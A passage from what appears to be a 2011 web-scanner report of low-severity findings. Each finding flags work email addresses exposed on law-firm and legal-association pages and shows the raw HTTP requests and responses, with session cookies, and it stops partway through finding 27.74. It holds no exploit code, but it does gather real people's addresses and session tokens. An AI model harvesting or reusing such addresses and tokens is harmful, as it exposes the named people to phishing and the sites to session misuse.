<a href="mailto:tkelley@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:flee@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:flee@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:flee@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:flee@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:flee@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:flee@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:clewis@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:clewis@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:clewis@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:llundy@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:llundy@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:llundy@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:llundy@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:llundy@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:llundy@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:llundy@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:llundy@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jluse@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jluse@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jluse@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jluse@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jluse@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jluse@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jluse@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:hmarion@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:hmarion@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:hmarion@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:hmarion@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:hmarion@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:hmarion@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:hmarion@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:hmarion@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:hmarion@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:hmarion@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bmowell@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bmowell@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bmowell@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bmowell@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bmowell@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lquinn@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lrauch@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lrauch@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lrauch@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lrauch@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lrauch@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lrauch@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lrauch@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:rrosenthal@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:wsammons@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bsaxton@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bsaxton@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bsaxton@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bsaxton@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bsaxton@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bsaxton@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:fstillman@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:fstillman@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:fstillman@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:fstillman@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:fstillman@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:sthomas@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:sthomas@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:sthomas@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:sthomas@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:sthomas@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:gtostanoski@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:gtostanoski@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:gtostanoski@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:gtostanoski@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:gtostanoski@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:gtostanoski@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:gtostanoski@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:ctully@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:ctully@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:ctully@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:ctully@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:ctully@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:ctully@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jtupis@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jtupis@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jtupis@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jtupis@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:jtupis@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lwasserman@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:lwasserman@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:bweiskopf@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:twilson@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:twilson@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:twilson@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:twilson@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:twilson@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:twilson@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
<a href="mailto:twilson@tydingslaw.com" class="attorneyEmail">
...[SNIP]...
27.66. http://www.tydingslaw.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /Resources/Shared/scripts/DotNetNukeAjaxShared.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/DotNetNukeAjaxShared.js?_=1305216162189 HTTP/1.1
Host: www.tydingslaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/javascript, application/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.tydingslaw.com/
Cookie: .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0; ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; language=en-US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 11 Jun 2009 22:31:00 GMT
Accept-Ranges: bytes
ETag: "06aaf4be4eac91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:04:47 GMT
Content-Length: 10101

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2007
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this softwar
...[SNIP]...
<history>
   ''' Version 1.0.0: Feb. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' Version 1.0.1: Oct. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' </history>
...[SNIP]...
27.67. http://www.tydingslaw.com/Resources/Shared/scripts/widgets.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /Resources/Shared/scripts/widgets.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/widgets.js?_=1305216165674 HTTP/1.1
Host: www.tydingslaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/javascript, application/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.tydingslaw.com/
Cookie: .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0; ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; language=en-US; __utma=39294886.1731180425.1305216163.1305216163.1305216163.1; __utmb=39294886.1.10.1305216163; __utmc=39294886; __utmz=39294886.1305216163.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tydings%20%26%20Rosenberg

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 07 Nov 2008 18:58:00 GMT
Accept-Ranges: bytes
ETag: "02cfcc0a41c91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:04:50 GMT
Content-Length: 11495

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2007
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and as
...[SNIP]...
<history>
''' Version 1.0.0: Oct. 16, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
''' </history>
...[SNIP]...
27.68. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Thu, 12 May 2011 16:59:25 GMT
Connection: close
Content-Length: 56512


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">OAS_listpos =
"InvCount,PageCount,AdOps1,Top7
...[SNIP]...
<a href="mailto:accuracy@usatoday.com?subject=Dealers prepare for worst if GM files Chapter 11 bankruptcy&body=http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm">
...[SNIP]...
<a href="mailto:letters@usatoday.com">letters@usatoday.com</a>
...[SNIP]...
27.69. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=2560 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D6%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.3.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D8%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<a href="mailto:jlindskoog@whdlaw.com ?subject=WALA%20Lending%20Library">
...[SNIP]...
27.70. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=3837 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<p>ALA - Wisconsin Chapter [sdantinne@wi-alamembers.ccsend.com]</p>
...[SNIP]...
<a href="mailto:sdantinne@dkattorneys.com?subject=WALA%20Constant%20Contact">
...[SNIP]...
27.71. http://www.wi-ala.org/clubportal/js/date-picker.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/js/date-picker.js

Issue detail

The following email address was disclosed in the response:

Request

GET /clubportal/js/date-picker.js HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23

Response

HTTP/1.1 200 OK
Content-Length: 16882
Content-Type: application/x-javascript
Content-Location: http://www.wi-ala.org/clubportal/js/date-picker.js
Last-Modified: Mon, 10 Dec 2007 07:00:00 GMT
Accept-Ranges: bytes
ETag: "018bf47fa3ac81:869"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 18:09:24 GMT


<!-- Original: Kedar R. Bhave (softricks@hotmail.com) -->
<!-- Web Site: http://www.softricks.com -->

<!-- This script and many more are available free online at -->
<!-- The JavaScript Sourc
...[SNIP]...
27.72. http://www.wi-ala.org/clubportal/loginretrieval.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/loginretrieval.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /clubportal/loginretrieval.cfm?clubID=177 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination.&username=
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D5%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.9.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A37%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D10%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:37 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<a href="mailto:jds@b-rlaw.com">jds@b-rlaw.com</a>
...[SNIP]...
27.73. http://www.wi-ala.org/clubportal/wala/Page.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/wala/Page.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /clubportal/wala/Page.cfm?clubID=177&pubmenuoptID=1361 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D8%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.6.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D9%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:53 GMT;path=/
Content-Type: text/html; charset=UTF-8


               <html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>
Membership -
...[SNIP]...
<a href="mailto:mandler@staffordlaw.com?subject=WALA%20Membership">
...[SNIP]...
27.74. http://www.wiggin.com/alumni.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /alumni.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /alumni.aspx HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/showarea.aspx?Show=10669
